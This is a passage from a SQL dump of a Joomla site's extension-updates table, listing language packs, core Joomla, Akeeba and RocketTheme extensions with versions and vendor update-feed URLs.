Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11203,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11204,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11205,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11206,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11207,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11208,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11209,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11210,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11211,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11212,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11213,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11214,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11215,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11216,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11217,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11218,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11219,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11220,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11221,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11222,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11223,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11225,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11226,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11227,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11228,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11229,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11230,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11231,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11232,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11233,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11234,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11235,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11236,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11237,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11238,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11239,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11240,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11241,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11242,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11243,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11244,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11245,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11246,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11247,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11248,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11249,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11250,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11251,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11252,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11253,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11254,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11255,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11256,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11257,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11258,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11259,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11260,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11261,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11262,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11263,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11264,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11265,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11266,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11267,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11268,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11269,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11270,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11271,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11272,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11273,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11274,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11275,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11276,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11277,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11278,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11279,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11280,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11281,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11282,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11283,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11284,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11285,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11286,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11287,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11288,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11289,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11290,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11291,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11292,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11293,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11294,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11295,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11296,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11297,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11298,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11299,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11300,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11301,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11302,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11303,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11304,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11305,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11306,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11307,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11308,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11309,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11310,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11311,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11312,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11313,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11314,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11315,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11316,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11317,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11318,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11319,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11320,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11321,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11322,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11323,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11324,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11325,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11326,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11327,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11328,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11329,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11330,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11331,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11332,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11333,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11334,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11335,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11336,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11337,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11338,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11339,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11340,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11341,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11342,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11343,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11344,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11345,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11346,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11347,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11348,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11349,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11350,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11351,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11352,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11353,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11354,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11355,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11356,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11357,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11358,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11359,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11360,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11361,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11362,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11363,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11364,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11365,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11366,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11367,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11368,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11369,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11370,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11371,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11372,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11373,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11374,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11375,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11376,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11377,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11378,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11379,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11380,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11381,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11382,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11383,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11384,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11385,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11386,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11387,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11388,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11389,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11390,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11391,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11392,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11393,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11394,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11395,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11396,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11397,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11398,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11399,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11400,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11401,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11402,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11403,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11404,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11405,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11406,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11407,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11408,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11409,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11410,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11411,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11412,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11413,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11414,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11415,57,0,'Chinese 